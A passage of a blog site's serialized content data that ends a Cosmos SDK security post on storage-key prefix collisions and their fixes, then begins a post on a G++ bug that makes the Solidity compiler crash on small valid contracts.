"props":88509,"children":88510},{"style":370},[88511],{"type":33,"value":76036},{"type":28,"tag":116,"props":88513,"children":88514},{"style":272},[88515],{"type":33,"value":88339},{"type":28,"tag":116,"props":88517,"children":88518},{"style":266},[88519],{"type":33,"value":141},{"type":28,"tag":116,"props":88521,"children":88522},{"style":282},[88523],{"type":33,"value":88348},{"type":28,"tag":116,"props":88525,"children":88526},{"style":266},[88527],{"type":33,"value":313},{"type":28,"tag":116,"props":88529,"children":88530},{"style":272},[88531],{"type":33,"value":85358},{"type":28,"tag":116,"props":88533,"children":88534},{"style":266},[88535],{"type":33,"value":825},{"type":28,"tag":116,"props":88537,"children":88538},{"style":272},[88539],{"type":33,"value":88302},{"type":28,"tag":116,"props":88541,"children":88542},{"style":266},[88543],{"type":33,"value":347},{"type":28,"tag":116,"props":88545,"children":88546},{"style":350},[88547],{"type":33,"value":1824},{"type":28,"tag":116,"props":88549,"children":88550},{"style":266},[88551],{"type":33,"value":55059},{"type":28,"tag":116,"props":88553,"children":88554},{"class":245,"line":1038},[88555,88559,88563,88567,88571],{"type":28,"tag":116,"props":88556,"children":88557},{"style":260},[88558],{"type":33,"value":2943},{"type":28,"tag":116,"props":88560,"children":88561},{"style":272},[88562],{"type":33,"value":48142},{"type":28,"tag":116,"props":88564,"children":88565},{"style":370},[88566],{"type":33,"value":64006},{"type":28,"tag":116,"props":88568,"children":88569},{"style":376},[88570],{"type":33,"value":81537},{"type":28,"tag":116,"props":88572,"children":88573},{"style":266},[88574],{"type":33,"value":1291},{"type":28,"tag":116,"props":88576,"children":88577},{"class":245,"line":1047},[88578,88582,88586,88590],{"type":28,"tag":116,"props":88579,"children":88580},{"style":260},[88581],{"type":33,"value":1017},{"type":28,"tag":116,"props":88583,"children":88584},{"style":376},[88585],{"type":33,"value":81537},{"type":28,"tag":116,"props":88587,"children":88588},{"style":266},[88589],{"type":33,"value":825},{"type":28,"tag":116,"props":88591,"children":88592},{"style":272},[88593],{"type":33,"value":83257},{"type":28,"tag":116,"props":88595,"children":88596},{"class":245,"line":1071},[88597],{"type":28,"tag":116,"props":88598,"children":88599},{"style":266},[88600],{"type":33,"value":1954},{"type":28,"tag":116,"props":88602,"children":88603},{"class":245,"line":1137},[88604],{"type":28,"tag":116,"props":88605,"children":88606},{"emptyLinePlaceholder":19},[88607],{"type":33,"value":1044},{"type":28,"tag":116,"props":88609,"children":88610},{"class":245,"line":1181},[88611,88615,88619,88623,88627,88631,88636,88640,88644,88649,88653,88657],{"type":28,"tag":116,"props":88612,"children":88613},{"style":260},[88614],{"type":33,"value":2943},{"type":28,"tag":116,"props":88616,"children":88617},{"style":272},[88618],{"type":33,"value":62261},{"type":28,"tag":116,"props":88620,"children":88621},{"style":266},[88622],{"type":33,"value":825},{"type":28,"tag":116,"props":88624,"children":88625},{"style":272},[88626],{"type":33,"value":78387},{"type":28,"tag":116,"props":88628,"children":88629},{"style":370},[88630],{"type":33,"value":76036},{"type":28,"tag":116,"props":88632,"children":88633},{"style":272},[88634],{"type":33,"value":88635}," values",{"type":28,"tag":116,"props":88637,"children":88638},{"style":266},[88639],{"type":33,"value":347},{"type":28,"tag":116,"props":88641,"children":88642},{"style":272},[88643],{"type":33,"value":85089},{"type":28,"tag":116,"props":88645,"children":88646},{"style":266},[88647],{"type":33,"value":88648},"]; ",{"type":28,"tag":116,"props":88650,"children":88651},{"style":370},[88652],{"type":33,"value":20285},{"type":28,"tag":116,"props":88654,"children":88655},{"style":272},[88656],{"type":33,"value":78387},{"type":28,"tag":116,"props":88658,"children":88659},{"style":266},[88660],{"type":33,"value":1291},{"type":28,"tag":116,"props":88662,"children":88663},{"class":245,"line":1212},[88664,88669,88673,88677,88681,88685,88689,88693,88697,88701,88705],{"type":28,"tag":116,"props":88665,"children":88666},{"style":272},[88667],{"type":33,"value":88668},"            values",{"type":28,"tag":116,"props":88670,"children":88671},{"style":266},[88672],{"type":33,"value":347},{"type":28,"tag":116,"props":88674,"children":88675},{"style":272},[88676],{"type":33,"value":85089},{"type":28,"tag":116,"props":88678,"children":88679},{"style":266},[88680],{"type":33,"value":8333},{"type":28,"tag":116,"props":88682,"children":88683},{"style":370},[88684],{"type":33,"value":373},{"type":28,"tag":116,"props":88686,"children":88687},{"style":282},[88688],{"type":33,"value":85182},{"type":28,"tag":116,"props":88690,"children":88691},{"style":266},[88692],{"type":33,"value":313},{"type":28,"tag":116,"props":88694,"children":88695},{"style":376},[88696],{"type":33,"value":66722},{"type":28,"tag":116,"props":88698,"children":88699},{"style":266},[88700],{"type":33,"value":347},{"type":28,"tag":116,"props":88702,"children":88703},{"style":339},[88704],{"type":33,"value":84787},{"type":28,"tag":116,"props":88706,"children":88707},{"style":266},[88708],{"type":33,"value":55059},{"type":28,"tag":116,"props":88710,"children":88711},{"class":245,"line":1254},[88712],{"type":28,"tag":116,"props":88713,"children":88714},{"style":266},[88715],{"type":33,"value":1954},{"type":28,"tag":116,"props":88717,"children":88718},{"class":245,"line":1262},[88719],{"type":28,"tag":116,"props":88720,"children":88721},{"emptyLinePlaceholder":19},[88722],{"type":33,"value":1044},{"type":28,"tag":116,"props":88724,"children":88725},{"class":245,"line":1294},[88726,88731,88735,88739,88743,88747,88751,88755,88759],{"type":28,"tag":116,"props":88727,"children":88728},{"style":272},[88729],{"type":33,"value":88730},"        values",{"type":28,"tag":116,"props":88732,"children":88733},{"style":266},[88734],{"type":33,"value":347},{"type":28,"tag":116,"props":88736,"children":88737},{"style":272},[88738],{"type":33,"value":85089},{"type":28,"tag":116,"props":88740,"children":88741},{"style":266},[88742],{"type":33,"value":48579},{"type":28,"tag":116,"props":88744,"children":88745},{"style":272},[88746],{"type":33,"value":85358},{"type":28,"tag":116,"props":88748,"children":88749},{"style":266},[88750],{"type":33,"value":8333},{"type":28,"tag":116,"props":88752,"children":88753},{"style":370},[88754],{"type":33,"value":373},{"type":28,"tag":116,"props":88756,"children":88757},{"style":272},[88758],{"type":33,"value":7096},{"type":28,"tag":116,"props":88760,"children":88761},{"style":266},[88762],{"type":33,"value":1291},{"type":28,"tag":116,"props":88764,"children":88765},{"class":245,"line":1334},[88766,88770,88774,88779,88783,88788],{"type":28,"tag":116,"props":88767,"children":88768},{"style":272},[88769],{"type":33,"value":26606},{"type":28,"tag":116,"props":88771,"children":88772},{"style":266},[88773],{"type":33,"value":14994},{"type":28,"tag":116,"props":88775,"children":88776},{"style":272},[88777],{"type":33,"value":88778},"iterator",{"type":28,"tag":116,"props":88780,"children":88781},{"style":266},[88782],{"type":33,"value":141},{"type":28,"tag":116,"props":88784,"children":88785},{"style":282},[88786],{"type":33,"value":88787},"Value",{"type":28,"tag":116,"props":88789,"children":88790},{"style":266},[88791],{"type":33,"value":3161},{"type":28,"tag":116,"props":88793,"children":88794},{"class":245,"line":1372},[88795],{"type":28,"tag":116,"props":88796,"children":88797},{"style":266},[88798],{"type":33,"value":1954},{"type":28,"tag":116,"props":88800,"children":88801},{"class":245,"line":1381},[88802],{"type":28,"tag":116,"props":88803,"children":88804},{"style":266},[88805],{"type":33,"value":3025},{"type":28,"tag":116,"props":88807,"children":88808},{"class":245,"line":1389},[88809,88813],{"type":28,"tag":116,"props":88810,"children":88811},{"style":260},[88812],{"type":33,"value":393},{"type":28,"tag":116,"props":88814,"children":88815},{"style":272},[88816],{"type":33,"value":88817}," values\n",{"type":28,"tag":116,"props":88819,"children":88820},{"class":245,"line":1425},[88821],{"type":28,"tag":116,"props":88822,"children":88823},{"style":266},[88824],{"type":33,"value":406},{"type":28,"tag":29,"props":88826,"children":88827},{},[88828,88830,88836,88837,88843,88845,88850,88852,88857,88859,88864,88866,88872,88874,88880],{"type":33,"value":88829},"By now, you may have already noticed that this implementation suffers from field malleability issues. Imagine a scenario where both ",{"type":28,"tag":98,"props":88831,"children":88833},{"className":88832},[],[88834],{"type":33,"value":88835},"vaultId = 1",{"type":33,"value":10659},{"type":28,"tag":98,"props":88838,"children":88840},{"className":88839},[],[88841],{"type":33,"value":88842},"vaultId = 10",{"type":33,"value":88844}," coexist. If we try to fetch data under ",{"type":28,"tag":98,"props":88846,"children":88848},{"className":88847},[],[88849],{"type":33,"value":88835},{"type":33,"value":88851},", all entries under ",{"type":28,"tag":98,"props":88853,"children":88855},{"className":88854},[],[88856],{"type":33,"value":88842},{"type":33,"value":88858}," will also be returned simply because ",{"type":28,"tag":98,"props":88860,"children":88862},{"className":88861},[],[88863],{"type":33,"value":1824},{"type":33,"value":88865}," is a prefix of ",{"type":28,"tag":98,"props":88867,"children":88869},{"className":88868},[],[88870],{"type":33,"value":88871},"10",{"type":33,"value":88873},". To fix this, we must once again append the ",{"type":28,"tag":98,"props":88875,"children":88877},{"className":88876},[],[88878],{"type":33,"value":88879},"Separator",{"type":33,"value":88881}," to the iterator prefix.",{"type":28,"tag":234,"props":88883,"children":88885},{"code":88884,"language":75784,"meta":7,"className":75785,"style":7},"i := sdk.KVStorePrefixIterator(\n    kvStore,\n    fmt.Sprintf(\"%s%d%s\", PositionMapPrefix, vaultId, Seperator),\n)\n",[88886],{"type":28,"tag":98,"props":88887,"children":88888},{"__ignoreMap":7},[88889,88916,88928,88981],{"type":28,"tag":116,"props":88890,"children":88891},{"class":245,"line":246},[88892,88896,88900,88904,88908,88912],{"type":28,"tag":116,"props":88893,"children":88894},{"style":272},[88895],{"type":33,"value":3408},{"type":28,"tag":116,"props":88897,"children":88898},{"style":370},[88899],{"type":33,"value":76036},{"type":28,"tag":116,"props":88901,"children":88902},{"style":272},[88903],{"type":33,"value":78261},{"type":28,"tag":116,"props":88905,"children":88906},{"style":266},[88907],{"type":33,"value":141},{"type":28,"tag":116,"props":88909,"children":88910},{"style":282},[88911],{"type":33,"value":88074},{"type":28,"tag":116,"props":88913,"children":88914},{"style":266},[88915],{"type":33,"value":3133},{"type":28,"tag":116,"props":88917,"children":88918},{"class":245,"line":256},[88919,88924],{"type":28,"tag":116,"props":88920,"children":88921},{"style":272},[88922],{"type":33,"value":88923},"    kvStore",{"type":28,"tag":116,"props":88925,"children":88926},{"style":266},[88927],{"type":33,"value":3178},{"type":28,"tag":116,"props":88929,"children":88930},{"class":245,"line":293},[88931,88936,88940,88944,88948,88953,88957,88961,88965,88969,88973,88977],{"type":28,"tag":116,"props":88932,"children":88933},{"style":272},[88934],{"type":33,"value":88935},"    fmt",{"type":28,"tag":116,"props":88937,"children":88938},{"style":266},[88939],{"type":33,"value":141},{"type":28,"tag":116,"props":88941,"children":88942},{"style":282},[88943],{"type":33,"value":84841},{"type":28,"tag":116,"props":88945,"children":88946},{"style":266},[88947],{"type":33,"value":313},{"type":28,"tag":116,"props":88949,"children":88950},{"style":563},[88951],{"type":33,"value":88952},"\"%s%d%s\"",{"type":28,"tag":116,"props":88954,"children":88955},{"style":266},[88956],{"type":33,"value":825},{"type":28,"tag":116,"props":88958,"children":88959},{"style":272},[88960],{"type":33,"value":88124},{"type":28,"tag":116,"props":88962,"children":88963},{"style":266},[88964],{"type":33,"value":825},{"type":28,"tag":116,"props":88966,"children":88967},{"style":272},[88968],{"type":33,"value":87909},{"type":28,"tag":116,"props":88970,"children":88971},{"style":266},[88972],{"type":33,"value":825},{"type":28,"tag":116,"props":88974,"children":88975},{"style":272},[88976],{"type":33,"value":88240},{"type":28,"tag":116,"props":88978,"children":88979},{"style":266},[88980],{"type":33,"value":6408},{"type":28,"tag":116,"props":88982,"children":88983},{"class":245,"line":361},[88984],{"type":28,"tag":116,"props":88985,"children":88986},{"style":266},[88987],{"type":33,"value":2830},{"type":28,"tag":29,"props":88989,"children":88990},{},[88991,88993,88998],{"type":33,"value":88992},"At first, identifying these serialization issues may seem easy. Once data structures and ",{"type":28,"tag":98,"props":88994,"children":88996},{"className":88995},[],[88997],{"type":33,"value":84595},{"type":33,"value":88999}," usage grow increasingly more complex, developers can unintentionally overlook storage key parsing mistakes.",{"type":28,"tag":29,"props":89001,"children":89002},{},[89003],{"type":33,"value":89004},"Storage keys continue to be a tedious and persistent issue when building on Cosmos. It is crucial to approach development with awareness and care to prevent bugs from creeping into code.",{"type":28,"tag":75,"props":89006,"children":89008},{"id":89007},"real-world-examples-5",[89009],{"type":33,"value":76309},{"type":28,"tag":29,"props":89011,"children":89012},{},[89013,89014,89019,89021,89028,89030,89036],{"type":33,"value":16275},{"type":28,"tag":98,"props":89015,"children":89017},{"className":89016},[],[89018],{"type":33,"value":78082},{"type":33,"value":89020}," previously lacked protection against KVStore ",{"type":28,"tag":87,"props":89022,"children":89025},{"href":89023,"rel":89024},"https://github.com/cosmos/cosmos-sdk/pull/9363",[91],[89026],{"type":33,"value":89027},"key collisions",{"type":33,"value":89029},". This prior oversight allowed developers to unintentionally create two ",{"type":28,"tag":98,"props":89031,"children":89033},{"className":89032},[],[89034],{"type":33,"value":89035},"KVStores",{"type":33,"value":89037}," that were not independent of each other.",{"type":28,"tag":29,"props":89039,"children":89040},{},[89041],{"type":28,"tag":87,"props":89042,"children":89045},{"href":89043,"rel":89044},"https://github.com/cosmos/cosmos-sdk/blob/25bd118e4cc1d60ab2f9d2e0302d271416551aa9/types/store.go#L108",[91],[89046],{"type":33,"value":76359},{"type":28,"tag":234,"props":89048,"children":89050},{"code":89049,"language":75784,"meta":7,"className":75785,"style":7},"func NewKVStoreKeys(names ...string) map[string]*KVStoreKey {\n    keys := make(map[string]*KVStoreKey)\n    for _, name := range names {\n        keys[name] = NewKVStoreKey(name)\n    }\n\n    return keys\n}\n",[89051],{"type":28,"tag":98,"props":89052,"children":89053},{"__ignoreMap":7},[89054,89116,89164,89200,89240,89247,89254,89266],{"type":28,"tag":116,"props":89055,"children":89056},{"class":245,"line":246},[89057,89061,89066,89070,89075,89079,89083,89087,89091,89095,89099,89103,89107,89112],{"type":28,"tag":116,"props":89058,"children":89059},{"style":376},[89060],{"type":33,"value":75920},{"type":28,"tag":116,"props":89062,"children":89063},{"style":282},[89064],{"type":33,"value":89065}," NewKVStoreKeys",{"type":28,"tag":116,"props":89067,"children":89068},{"style":266},[89069],{"type":33,"value":313},{"type":28,"tag":116,"props":89071,"children":89072},{"style":272},[89073],{"type":33,"value":89074},"names",{"type":28,"tag":116,"props":89076,"children":89077},{"style":370},[89078],{"type":33,"value":24954},{"type":28,"tag":116,"props":89080,"children":89081},{"style":339},[89082],{"type":33,"value":29322},{"type":28,"tag":116,"props":89084,"children":89085},{"style":266},[89086],{"type":33,"value":1609},{"type":28,"tag":116,"props":89088,"children":89089},{"style":376},[89090],{"type":33,"value":66722},{"type":28,"tag":116,"props":89092,"children":89093},{"style":266},[89094],{"type":33,"value":347},{"type":28,"tag":116,"props":89096,"children":89097},{"style":339},[89098],{"type":33,"value":29322},{"type":28,"tag":116,"props":89100,"children":89101},{"style":266},[89102],{"type":33,"value":15074},{"type":28,"tag":116,"props":89104,"children":89105},{"style":370},[89106],{"type":33,"value":4240},{"type":28,"tag":116,"props":89108,"children":89109},{"style":339},[89110],{"type":33,"value":89111},"KVStoreKey",{"type":28,"tag":116,"props":89113,"children":89114},{"style":266},[89115],{"type":33,"value":1291},{"type":28,"tag":116,"props":89117,"children":89118},{"class":245,"line":256},[89119,89124,89128,89132,89136,89140,89144,89148,89152,89156,89160],{"type":28,"tag":116,"props":89120,"children":89121},{"style":272},[89122],{"type":33,"value":89123},"    keys",{"type":28,"tag":116,"props":89125,"children":89126},{"style":370},[89127],{"type":33,"value":76036},{"type":28,"tag":116,"props":89129,"children":89130},{"style":282},[89131],{"type":33,"value":85182},{"type":28,"tag":116,"props":89133,"children":89134},{"style":266},[89135],{"type":33,"value":313},{"type":28,"tag":116,"props":89137,"children":89138},{"style":376},[89139],{"type":33,"value":66722},{"type":28,"tag":116,"props":89141,"children":89142},{"style":266},[89143],{"type":33,"value":347},{"type":28,"tag":116,"props":89145,"children":89146},{"style":339},[89147],{"type":33,"value":29322},{"type":28,"tag":116,"props":89149,"children":89150},{"style":266},[89151],{"type":33,"value":15074},{"type":28,"tag":116,"props":89153,"children":89154},{"style":370},[89155],{"type":33,"value":4240},{"type":28,"tag":116,"props":89157,"children":89158},{"style":339},[89159],{"type":33,"value":89111},{"type":28,"tag":116,"props":89161,"children":89162},{"style":266},[89163],{"type":33,"value":2830},{"type":28,"tag":116,"props":89165,"children":89166},{"class":245,"line":293},[89167,89171,89175,89179,89183,89187,89191,89196],{"type":28,"tag":116,"props":89168,"children":89169},{"style":260},[89170],{"type":33,"value":2703},{"type":28,"tag":116,"props":89172,"children":89173},{"style":272},[89174],{"type":33,"value":2708},{"type":28,"tag":116,"props":89176,"children":89177},{"style":266},[89178],{"type":33,"value":825},{"type":28,"tag":116,"props":89180,"children":89181},{"style":272},[89182],{"type":33,"value":48119},{"type":28,"tag":116,"props":89184,"children":89185},{"style":370},[89186],{"type":33,"value":76036},{"type":28,"tag":116,"props":89188,"children":89189},{"style":260},[89190],{"type":33,"value":77019},{"type":28,"tag":116,"props":89192,"children":89193},{"style":272},[89194],{"type":33,"value":89195}," names",{"type":28,"tag":116,"props":89197,"children":89198},{"style":266},[89199],{"type":33,"value":1291},{"type":28,"tag":116,"props":89201,"children":89202},{"class":245,"line":361},[89203,89207,89211,89215,89219,89223,89228,89232,89236],{"type":28,"tag":116,"props":89204,"children":89205},{"style":272},[89206],{"type":33,"value":24986},{"type":28,"tag":116,"props":89208,"children":89209},{"style":266},[89210],{"type":33,"value":347},{"type":28,"tag":116,"props":89212,"children":89213},{"style":272},[89214],{"type":33,"value":48119},{"type":28,"tag":116,"props":89216,"children":89217},{"style":266},[89218],{"type":33,"value":8333},{"type":28,"tag":116,"props":89220,"children":89221},{"style":370},[89222],{"type":33,"value":373},{"type":28,"tag":116,"props":89224,"children":89225},{"style":282},[89226],{"type":33,"value":89227}," NewKVStoreKey",{"type":28,"tag":116,"props":89229,"children":89230},{"style":266},[89231],{"type":33,"value":313},{"type":28,"tag":116,"props":89233,"children":89234},{"style":272},[89235],{"type":33,"value":48119},{"type":28,"tag":116,"props":89237,"children":89238},{"style":266},[89239],{"type":33,"value":2830},{"type":28,"tag":116,"props":89241,"children":89242},{"class":245,"line":387},[89243],{"type":28,"tag":116,"props":89244,"children":89245},{"style":266},[89246],{"type":33,"value":3025},{"type":28,"tag":116,"props":89248,"children":89249},{"class":245,"line":400},[89250],{"type":28,"tag":116,"props":89251,"children":89252},{"emptyLinePlaceholder":19},[89253],{"type":33,"value":1044},{"type":28,"tag":116,"props":89255,"children":89256},{"class":245,"line":614},[89257,89261],{"type":28,"tag":116,"props":89258,"children":89259},{"style":260},[89260],{"type":33,"value":393},{"type":28,"tag":116,"props":89262,"children":89263},{"style":272},[89264],{"type":33,"value":89265}," keys\n",{"type":28,"tag":116,"props":89267,"children":89268},{"class":245,"line":631},[89269],{"type":28,"tag":116,"props":89270,"children":89271},{"style":266},[89272],{"type":33,"value":406},{"type":28,"tag":29,"props":89274,"children":89275},{},[89276,89278,89283,89285,89290,89292,89297],{"type":33,"value":89277},"Thanks to the diligence of core developers, checks are now enforced and the ",{"type":28,"tag":98,"props":89279,"children":89281},{"className":89280},[],[89282],{"type":33,"value":78082},{"type":33,"value":89284}," will refuse to run if any ",{"type":28,"tag":98,"props":89286,"children":89288},{"className":89287},[],[89289],{"type":33,"value":84595},{"type":33,"value":89291}," keys are prefix of each other. This implementation alleviates developers from having to worry about key collisions on the ",{"type":28,"tag":98,"props":89293,"children":89295},{"className":89294},[],[89296],{"type":33,"value":84595},{"type":33,"value":89298}," level.",{"type":28,"tag":29,"props":89300,"children":89301},{},[89302,89304,89311],{"type":33,"value":89303},"Additional storage key issues like subtle bugs in the Cosmos-SDK have resulted in ",{"type":28,"tag":87,"props":89305,"children":89308},{"href":89306,"rel":89307},"https://github.com/cosmos/cosmos-sdk/issues/12661",[91],[89309],{"type":33,"value":89310},"incorrect iterator behavior",{"type":33,"value":141},{"type":28,"tag":29,"props":89313,"children":89314},{},[89315,89317,89324],{"type":33,"value":89316},"Notably, gradual adoption of the ",{"type":28,"tag":87,"props":89318,"children":89321},{"href":89319,"rel":89320},"https://github.com/cosmos/cosmos-sdk/tree/def657dafa615cb8e8bb072452663893157e073a/collections",[91],[89322],{"type":33,"value":89323},"collections",{"type":33,"value":89325}," storage helpers since Cosmos v0.50 has made it a lot more difficult to write buggy code. This demonstrates the importance of keeping up to date with the latest SDK development to leverage architectural security improvements.",{"type":28,"tag":63,"props":89327,"children":89328},{"id":2506},[89329],{"type":33,"value":2509},{"type":28,"tag":29,"props":89331,"children":89332},{},[89333],{"type":33,"value":89334},"The Cosmos SDK is a powerful tool for those who want to create custom blockchains. However, this flexibility brings about great responsibility. Developers must pay close attention to nuances, as these can expose a large number of potential attack surfaces.",{"type":28,"tag":29,"props":89336,"children":89337},{},[89338],{"type":33,"value":89339},"To recap, we discussed some of the more basic parts of Cosmos-SDK, showcasing common mistakes developers tend to make. Yet, it is important to note that we've only covered the tip of the iceberg. Other attack surfaces, such as authentications in relation to the IBC interface, are fundamentals absolutely worth looking into.",{"type":28,"tag":2516,"props":89341,"children":89342},{},[89343],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":89345},[89346,89347,89350,89353,89356,89359,89362,89365],{"id":28670,"depth":256,"text":28673},{"id":75501,"depth":256,"text":75504,"children":89348},[89349],{"id":76306,"depth":293,"text":76309},{"id":76902,"depth":256,"text":76905,"children":89351},[89352],{"id":77551,"depth":293,"text":76309},{"id":78048,"depth":256,"text":78051,"children":89354},[89355],{"id":79347,"depth":293,"text":76309},{"id":80691,"depth":256,"text":80694,"children":89357},[89358],{"id":81229,"depth":293,"text":76309},{"id":82747,"depth":256,"text":82750,"children":89360},[89361],{"id":83627,"depth":293,"text":76309},{"id":84581,"depth":256,"text":84584,"children":89363},[89364],{"id":89007,"depth":293,"text":76309},{"id":2506,"depth":256,"text":2509},"content:blog:2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security",{"_path":89370,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":89371,"description":89372,"author":89373,"image":89374,"date":89376,"tags":89377,"isFeatured":19,"onBlogPage":19,"body":89378,"_type":2534,"_id":92085,"_source":2536,"_file":92086,"_stem":92087,"_extension":2539},"/blog/2025-08-11-compiler-bug-causes-compiler-bug","Compiler Bug Causes Compiler Bug: How a 12-Year-Old G++ Bug Took Down Solidity","A subtle G++ bug from 2012, C++20's new comparison rules, and legacy Boost code can collide to crash Solidity's compiler on valid code. We unpack the surprising chain reaction and how to fix it.","kiprey",{"src":89375,"height":18,"width":18},"/posts/compiler-bug-causes-compiler-bug/title.png","2025-08-11",[4142,28665],{"type":25,"children":89379,"toc":92069},[89380,89385,89522,89527,89532,89537,89542,89655,89660,89665,89670,89710,89723,89728,89746,89751,89754,89760,89774,89787,89792,89805,89810,89822,89835,89840,89843,89849,89855,89912,89917,89923,89937,89972,89980,89988,90008,90014,90019,90458,90466,90510,90515,90523,90531,90570,90575,90583,90588,90591,90597,90603,90628,90640,90667,90700,90705,90708,90714,90733,91251,91264,91282,91305,91316,91321,91424,91429,91434,91448,91453,91529,91547,91552,91555,91561,91573,91585,91924,91929,91947,91952,91955,91961,91966,91984,92004,92007,92013,92032,92035,92039,92044,92055,92060,92065],{"type":28,"tag":29,"props":89381,"children":89382},{},[89383],{"type":33,"value":89384},"Compilers aren't supposed to crash — especially not when compiling perfectly valid code like this:",{"type":28,"tag":234,"props":89386,"children":89388},{"code":89387,"language":4142,"meta":7,"className":4143,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n    function a() public pure returns (uint256) {\n        return 1 ** 2;\n    }\n}\n",[89389],{"type":28,"tag":98,"props":89390,"children":89391},{"__ignoreMap":7},[89392,89400,89418,89425,89442,89484,89508,89515],{"type":28,"tag":116,"props":89393,"children":89394},{"class":245,"line":246},[89395],{"type":28,"tag":116,"props":89396,"children":89397},{"style":250},[89398],{"type":33,"value":89399},"// SPDX-License-Identifier: UNLICENSED\n",{"type":28,"tag":116,"props":89401,"children":89402},{"class":245,"line":256},[89403,89408,89413],{"type":28,"tag":116,"props":89404,"children":89405},{"style":260},[89406],{"type":33,"value":89407},"pragma",{"type":28,"tag":116,"props":89409,"children":89410},{"style":376},[89411],{"type":33,"value":89412}," solidity",{"type":28,"tag":116,"props":89414,"children":89415},{"style":266},[89416],{"type":33,"value":89417}," ^0.8.25;\n",{"type":28,"tag":116,"props":89419,"children":89420},{"class":245,"line":293},[89421],{"type":28,"tag":116,"props":89422,"children":89423},{"emptyLinePlaceholder":19},[89424],{"type":33,"value":1044},{"type":28,"tag":116,"props":89426,"children":89427},{"class":245,"line":361},[89428,89433,89438],{"type":28,"tag":116,"props":89429,"children":89430},{"style":376},[89431],{"type":33,"value":89432},"contract",{"type":28,"tag":116,"props":89434,"children":89435},{"style":339},[89436],{"type":33,"value":89437}," A",{"type":28,"tag":116,"props":89439,"children":89440},{"style":266},[89441],{"type":33,"value":1291},{"type":28,"tag":116,"props":89443,"children":89444},{"class":245,"line":387},[89445,89450,89455,89459,89463,89468,89472,89476,89480],{"type":28,"tag":116,"props":89446,"children":89447},{"style":376},[89448],{"type":33,"value":89449},"    function",{"type":28,"tag":116,"props":89451,"children":89452},{"style":282},[89453],{"type":33,"value":89454}," a",{"type":28,"tag":116,"props":89456,"children":89457},{"style":266},[89458],{"type":33,"value":13709},{"type":28,"tag":116,"props":89460,"children":89461},{"style":376},[89462],{"type":33,"value":61294},{"type":28,"tag":116,"props":89464,"children":89465},{"style":376},[89466],{"type":33,"value":89467}," pure",{"type":28,"tag":116,"props":89469,"children":89470},{"style":260},[89471],{"type":33,"value":75613},{"type":28,"tag":116,"props":89473,"children":89474},{"style":266},[89475],{"type":33,"value":269},{"type":28,"tag":116,"props":89477,"children":89478},{"style":339},[89479],{"type":33,"value":45793},{"type":28,"tag":116,"props":89481,"children":89482},{"style":266},[89483],{"type":33,"value":844},{"type":28,"tag":116,"props":89485,"children":89486},{"class":245,"line":400},[89487,89491,89495,89500,89504],{"type":28,"tag":116,"props":89488,"children":89489},{"style":260},[89490],{"type":33,"value":15405},{"type":28,"tag":116,"props":89492,"children":89493},{"style":350},[89494],{"type":33,"value":4192},{"type":28,"tag":116,"props":89496,"children":89497},{"style":370},[89498],{"type":33,"value":89499}," **",{"type":28,"tag":116,"props":89501,"children":89502},{"style":350},[89503],{"type":33,"value":7606},{"type":28,"tag":116,"props":89505,"children":89506},{"style":266},[89507],{"type":33,"value":384},{"type":28,"tag":116,"props":89509,"children":89510},{"class":245,"line":614},[89511],{"type":28,"tag":116,"props":89512,"children":89513},{"style":266},[89514],{"type":33,"value":3025},{"type":28,"tag":116,"props":89516,"children":89517},{"class":245,"line":631},[89518],{"type":28,"tag":116,"props":89519,"children":89520},{"style":266},[89521],{"type":33,"value":406},{"type":28,"tag":29,"props":89523,"children":89524},{},[89525],{"type":33,"value":89526},"Yet running Solidity's compiler (solc) on this file on a standard Ubuntu 22.04 system (G++ 11.4, Boost 1.74) causes an immediate segmentation fault.",{"type":28,"tag":29,"props":89528,"children":89529},{},[89530],{"type":33,"value":89531},"At first, this seemed absurd. The code just returns 1 to the power of 2 — no memory tricks, unsafe casting, or undefined behavior.",{"type":28,"tag":29,"props":89533,"children":89534},{},[89535],{"type":33,"value":89536},"And yet, it crashes.",{"type":28,"tag":29,"props":89538,"children":89539},{},[89540],{"type":33,"value":89541},"Another minimal example?",{"type":28,"tag":234,"props":89543,"children":89545},{"code":89544,"language":4142,"meta":7,"className":4143,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n    function a() public pure {\n        uint256[1] data;\n    }\n}\n",[89546],{"type":28,"tag":98,"props":89547,"children":89548},{"__ignoreMap":7},[89549,89556,89571,89578,89593,89620,89641,89648],{"type":28,"tag":116,"props":89550,"children":89551},{"class":245,"line":246},[89552],{"type":28,"tag":116,"props":89553,"children":89554},{"style":250},[89555],{"type":33,"value":89399},{"type":28,"tag":116,"props":89557,"children":89558},{"class":245,"line":256},[89559,89563,89567],{"type":28,"tag":116,"props":89560,"children":89561},{"style":260},[89562],{"type":33,"value":89407},{"type":28,"tag":116,"props":89564,"children":89565},{"style":376},[89566],{"type":33,"value":89412},{"type":28,"tag":116,"props":89568,"children":89569},{"style":266},[89570],{"type":33,"value":89417},{"type":28,"tag":116,"props":89572,"children":89573},{"class":245,"line":293},[89574],{"type":28,"tag":116,"props":89575,"children":89576},{"emptyLinePlaceholder":19},[89577],{"type":33,"value":1044},{"type":28,"tag":116,"props":89579,"children":89580},{"class":245,"line":361},[89581,89585,89589],{"type":28,"tag":116,"props":89582,"children":89583},{"style":376},[89584],{"type":33,"value":89432},{"type":28,"tag":116,"props":89586,"children":89587},{"style":339},[89588],{"type":33,"value":89437},{"type":28,"tag":116,"props":89590,"children":89591},{"style":266},[89592],{"type":33,"value":1291},{"type":28,"tag":116,"props":89594,"children":89595},{"class":245,"line":387},[89596,89600,89604,89608,89612,89616],{"type":28,"tag":116,"props":89597,"children":89598},{"style":376},[89599],{"type":33,"value":89449},{"type":28,"tag":116,"props":89601,"children":89602},{"style":282},[89603],{"type":33,"value":89454},{"type":28,"tag":116,"props":89605,"children":89606},{"style":266},[89607],{"type":33,"value":13709},{"type":28,"tag":116,"props":89609,"children":89610},{"style":376},[89611],{"type":33,"value":61294},{"type":28,"tag":116,"props":89613,"children":89614},{"style":376},[89615],{"type":33,"value":89467},{"type":28,"tag":116,"props":89617,"children":89618},{"style":266},[89619],{"type":33,"value":1291},{"type":28,"tag":116,"props":89621,"children":89622},{"class":245,"line":400},[89623,89628,89632,89636],{"type":28,"tag":116,"props":89624,"children":89625},{"style":339},[89626],{"type":33,"value":89627},"        